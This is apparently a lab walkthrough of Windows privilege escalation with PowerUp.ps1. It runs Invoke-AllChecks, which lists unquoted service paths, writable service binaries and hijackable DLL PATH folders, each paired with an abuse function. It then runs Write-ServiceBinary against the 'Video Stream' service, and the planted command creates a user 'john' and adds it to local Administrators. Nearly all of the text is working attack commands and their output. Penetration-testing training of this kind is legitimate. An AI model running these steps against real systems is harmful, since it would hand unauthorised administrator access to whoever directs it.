This is how you invoke PowerUp in PowerShell for the first time.

PS C:\tools> import-module .\PowerUp.ps1
 
Security warning
Run only scripts that you trust. While scripts from the internet can be useful, this script can potentially harm your
computer. If you trust this script, use the Unblock-File cmdlet to allow the script to run without this warning
message. Do you want to run C:\tools\PowerUp.ps1?
[D] Do not run  [R] Run once  [S] Suspend  [?] Help (default is "D"): R

This will run all the checks available in PowerUp.

PS C:\tools> Invoke-AllChecks
 
[*] Running Invoke-AllChecks
 
 
[*] Checking if user is in a local group with administrative privileges...
 
 
[*] Checking for unquoted service paths...
 
 
ServiceName    : Video Stream
Path           : C:\Program Files\VideoStream\1337 Log\checklog.exe
ModifiablePath : @{ModifiablePath=C:\; IdentityReference=NT AUTHORITY\Authenticated Users; Permissions=System.Object[]}
StartName      : LocalSystem
AbuseFunction  : Write-ServiceBinary -Name 'Video Stream' -Path <HijackPath>
CanRestart     : False
 
ServiceName    : Video Stream
Path           : C:\Program Files\VideoStream\1337 Log\checklog.exe
ModifiablePath : @{ModifiablePath=C:\; IdentityReference=NT AUTHORITY\Authenticated Users; Permissions=System.Object[]}
StartName      : LocalSystem
AbuseFunction  : Write-ServiceBinary -Name 'Video Stream' -Path <HijackPath>
CanRestart     : False
 
 
 
 
 
[*] Checking service executable and argument permissions...
 
 
ServiceName                     : edgeupdate
Path                            : "C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /svc
ModifiableFile                  : C:\
ModifiableFilePermissions       : {Delete, WriteAttributes, Synchronize, ReadControl...}
ModifiableFileIdentityReference : NT AUTHORITY\Authenticated Users
StartName                       : LocalSystem
AbuseFunction                   : Install-ServiceBinary -Name 'edgeupdate'
CanRestart                      : False
 
ServiceName                     : edgeupdate
Path                            : "C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /svc
ModifiableFile                  : C:\
ModifiableFilePermissions       : {Synchronize, AppendData/AddSubdirectory}
ModifiableFileIdentityReference : NT AUTHORITY\Authenticated Users
StartName                       : LocalSystem
AbuseFunction                   : Install-ServiceBinary -Name 'edgeupdate'
CanRestart                      : False
 
ServiceName                     : edgeupdatem
Path                            : "C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /medsvc
ModifiableFile                  : C:\
ModifiableFilePermissions       : {Delete, WriteAttributes, Synchronize, ReadControl...}
ModifiableFileIdentityReference : NT AUTHORITY\Authenticated Users
StartName                       : LocalSystem
AbuseFunction                   : Install-ServiceBinary -Name 'edgeupdatem'
CanRestart                      : False
 
ServiceName                     : edgeupdatem
Path                            : "C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /medsvc
ModifiableFile                  : C:\
ModifiableFilePermissions       : {Synchronize, AppendData/AddSubdirectory}
ModifiableFileIdentityReference : NT AUTHORITY\Authenticated Users
StartName                       : LocalSystem
AbuseFunction                   : Install-ServiceBinary -Name 'edgeupdatem'
CanRestart                      : False
 
ServiceName                     : gupdate
Path                            : "C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /svc
ModifiableFile                  : C:\
ModifiableFilePermissions       : {Delete, WriteAttributes, Synchronize, ReadControl...}
ModifiableFileIdentityReference : NT AUTHORITY\Authenticated Users
StartName                       : LocalSystem
AbuseFunction                   : Install-ServiceBinary -Name 'gupdate'
CanRestart                      : False
 
ServiceName                     : gupdate
Path                            : "C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /svc
ModifiableFile                  : C:\
ModifiableFilePermissions       : {Synchronize, AppendData/AddSubdirectory}
ModifiableFileIdentityReference : NT AUTHORITY\Authenticated Users
StartName                       : LocalSystem
AbuseFunction                   : Install-ServiceBinary -Name 'gupdate'
CanRestart                      : False
 
ServiceName                     : gupdatem
Path                            : "C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /medsvc
ModifiableFile                  : C:\
ModifiableFilePermissions       : {Delete, WriteAttributes, Synchronize, ReadControl...}
ModifiableFileIdentityReference : NT AUTHORITY\Authenticated Users
StartName                       : LocalSystem
AbuseFunction                   : Install-ServiceBinary -Name 'gupdatem'
CanRestart                      : False
 
ServiceName                     : gupdatem
Path                            : "C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /medsvc
ModifiableFile                  : C:\
ModifiableFilePermissions       : {Synchronize, AppendData/AddSubdirectory}
ModifiableFileIdentityReference : NT AUTHORITY\Authenticated Users
StartName                       : LocalSystem
AbuseFunction                   : Install-ServiceBinary -Name 'gupdatem'
CanRestart                      : False
 
ServiceName                     : neo4j
Path                            : C:\Tools\neo4j\bin\tools\prunsrv-amd64.exe //RS//neo4j
ModifiableFile                  : C:\Tools\neo4j\bin\tools\prunsrv-amd64.exe
ModifiableFilePermissions       : {Delete, WriteAttributes, Synchronize, ReadControl...}
ModifiableFileIdentityReference : NT AUTHORITY\Authenticated Users
StartName                       : LocalSystem
AbuseFunction                   : Install-ServiceBinary -Name 'neo4j'
CanRestart                      : False
 
ServiceName                     : Video Stream
Path                            : C:\Program Files\VideoStream\1337 Log\checklog.exe
ModifiableFile                  : C:\Program Files\VideoStream\1337 Log\checklog.exe
ModifiableFilePermissions       : {WriteOwner, Delete, WriteAttributes, Synchronize...}
ModifiableFileIdentityReference : BUILTIN\Users
StartName                       : LocalSystem
AbuseFunction                   : Install-ServiceBinary -Name 'Video Stream'
CanRestart                      : False
 
 
 
 
 
[*] Checking service permissions...
 
 
[*] Checking %PATH% for potentially hijackable DLL locations...
 
 
ModifiablePath    : C:\Python27\
IdentityReference : NT AUTHORITY\Authenticated Users
Permissions       : {Delete, WriteAttributes, Synchronize, ReadControl...}
%PATH%            : C:\Python27\
AbuseFunction     : Write-HijackDll -DllPath 'C:\Python27\\wlbsctrl.dll'
 
ModifiablePath    : C:\Python27\Scripts
IdentityReference : NT AUTHORITY\Authenticated Users
Permissions       : {Delete, WriteAttributes, Synchronize, ReadControl...}
%PATH%            : C:\Python27\Scripts
AbuseFunction     : Write-HijackDll -DllPath 'C:\Python27\Scripts\wlbsctrl.dll'
 
ModifiablePath    : C:\Tools
IdentityReference : NT AUTHORITY\Authenticated Users
Permissions       : {Delete, WriteAttributes, Synchronize, ReadControl...}
%PATH%            : C:\Tools\SysinternalsSuite
AbuseFunction     : Write-HijackDll -DllPath 'C:\Tools\wlbsctrl.dll'
 
ModifiablePath    : C:\Users\notadmin\AppData\Local\Microsoft\WindowsApps
IdentityReference : SEC560STUDENT\notadmin
Permissions       : {WriteOwner, Delete, WriteAttributes, Synchronize...}
%PATH%            : C:\Users\notadmin\AppData\Local\Microsoft\WindowsApps
AbuseFunction     : Write-HijackDll -DllPath 'C:\Users\notadmin\AppData\Local\Microsoft\WindowsApps\wlbsctrl.dll'
 
 
 
 
 
[*] Checking for AlwaysInstallElevated registry key...
 
 
[*] Checking for Autologon credentials in registry...
 
 
[*] Checking for modifidable registry autoruns and configs...
 
 
[*] Checking for modifiable schtask files/configs...
 
 
[*] Checking for unattended install files...
 
 
[*] Checking for encrypted web.config strings...
 
 
[*] Checking for encrypted application pool and virtual directory passwords...
 
 
[*] Checking for plaintext passwords in McAfee SiteList.xml files....
 
 
 
 
[*] Checking for cached Group Policy Preferences .xml files....

This command will write the vulnerable path identified in the previous command to the registry entry of the vulnerable service.

PS C:\tools> Write-ServiceBinary -ServiceName 'Video Stream' -Path 'C:\Program Files\VideoStream\1337.exe'
 
ServiceName  Path                                  Command
-----------  ----                                  -------
Video Stream C:\Program Files\VideoStream\1337.exe net user john Password123! /add && timeout /t 5 && net localgroup Administrators john /add